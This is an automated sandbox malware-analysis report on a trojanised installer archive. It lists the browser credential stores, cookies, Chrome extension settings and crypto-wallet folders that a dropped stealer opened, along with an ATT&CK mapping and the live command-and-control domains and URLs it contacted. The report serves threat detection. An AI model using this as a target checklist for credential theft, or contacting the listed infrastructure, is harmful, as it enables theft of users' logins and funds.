                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                  Source: Yara matchFile source: Process Memory Space: Lightweight.com PID: 2920, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 10.3.7zG.exe.1bfd0a76ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7zG.exe PID: 744, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  13
                  Process Injection
                  11
                  Masquerading
                  2
                  OS Credential Dumping
                  221
                  Security Software Discovery
                  Remote Services11
                  Input Capture
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  221
                  Virtualization/Sandbox Evasion
                  11
                  Input Capture
                  3
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)13
                  Process Injection
                  Security Account Manager221
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares41
                  Data from Local System
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets12
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Rundll32
                  Cached Domain Credentials23
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581027 Sample: installer_1.05_36.4.zip Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 53 laborersquei.click 2->53 55 dfgh.online 2->55 57 3 other IPs or domains 2->57 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 6 other signatures 2->73 10 installer_1.05_36.4.exe 16 2->10         started        12 7zG.exe 14 2->12         started        16 notepad.exe 9 2->16         started        18 rundll32.exe 2->18         started        signatures3 process4 file5 20 cmd.exe 2 10->20         started        45 C:\Users\user\Desktop\...\vcruntime140.dll, PE32+ 12->45 dropped 47 C:\Users\user\Desktop\...\opengl64.dll, PE32+ 12->47 dropped 49 C:\Users\user\Desktop\...\opengl32sw.dll, PE32+ 12->49 dropped 51 4 other files (none is malicious) 12->51 dropped 85 Found many strings related to Crypto-Wallets (likely being stolen) 12->85 signatures6 process7 file8 43 C:\Users\user\AppData\...\Lightweight.com, PE32 20->43 dropped 75 Drops PE files with a suspicious file extension 20->75 24 Lightweight.com 20->24         started        28 cmd.exe 2 20->28         started        30 extrac32.exe 17 20->30         started        32 8 other processes 20->32 signatures9 process10 dnsIp11 59 laborersquei.click 172.67.166.49, 443, 49708, 49709 CLOUDFLARENETUS United States 24->59 61 cegu.shop 185.161.251.21, 443, 49718 NTLGB United Kingdom 24->61 63 klipsyzogey.shop 172.67.214.186, 443, 49719 CLOUDFLARENETUS United States 24->63 77 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->77 79 Suspicious powershell command line found 24->79 81 Query firmware table information (likely to detect VMs) 24->81 83 5 other signatures 24->83 34 powershell.exe 21 24->34         started        37 powershell.exe 15 15 24->37         started        signatures12 process13 signatures14 65 Loading BitLocker PowerShell Module 34->65 39 conhost.exe 34->39         started        41 conhost.exe 37->41         started        process15

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  installer_1.05_36.4.zip0%ReversingLabs
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\709182\Lightweight.com0%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dll0%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dll0%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL3%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dll0%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dll0%ReversingLabs
                  C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dll0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
                  https://cegu.shop/0%Avira URL Cloudsafe
                  https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK100%Avira URL Cloudmalware
                  http://www.avast.com0/0%Avira URL Cloudsafe
                  https://dfgh.online0%Avira URL Cloudsafe
                  https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa0%Avira URL Cloudsafe
                  https://laborersquei.click/0%Avira URL Cloudsafe
                  https://klipsyzogey.shop/100%Avira URL Cloudmalware
                  http://www.crossteccorp.com0%Avira URL Cloudsafe
                  http://www.microsoft.Ah0%Avira URL Cloudsafe
                  https://laborersquei.click/apie0%Avira URL Cloudsafe
                  http://www.google.comDUMPREQFLUSHD:/build/0%Avira URL Cloudsafe
                  http://go.microsx0%Avira URL Cloudsafe
                  https://epicsupport.force.com/unrealengine/s/0%Avira URL Cloudsafe
                  https://klipsyzogey.shop/int_clp_sha.txt100%Avira URL Cloudmalware
                  https://laborersquei.click:443/api0%Avira URL Cloudsafe
                  laborersquei.click0%Avira URL Cloudsafe
                  https://laborersquei.click/api0%Avira URL Cloudsafe
                  https://cegu.shop/8574262446/ph.txt0%Avira URL Cloudsafe
                  https://dfgh.online/invoker.php?compName=user-PCLg0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cegu.shop
                  185.161.251.21
                  truefalse
                    unknown
                    laborersquei.click
                    172.67.166.49
                    truetrue
                      unknown
                      klipsyzogey.shop
                      172.67.214.186
                      truefalse
                        high
                        MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc
                        unknown
                        unknownfalse
                          unknown
                          dfgh.online
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            scentniej.buzzfalse
                              high
                              hummskitnj.buzzfalse
                                high
                                rebuildeso.buzzfalse
                                  high
                                  appliacnesot.buzzfalse
                                    high
                                    screwamusresz.buzzfalse
                                      high
                                      laborersquei.clicktrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      cashfuzysao.buzzfalse
                                        high
                                        inherineau.buzzfalse
                                          high
                                          https://klipsyzogey.shop/int_clp_sha.txtfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          prisonyfork.buzzfalse
                                            high
                                            https://cegu.shop/8574262446/ph.txtfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://laborersquei.click/apitrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabLightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupULightweight.com, 00000017.00000003.2161329434.0000000005D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
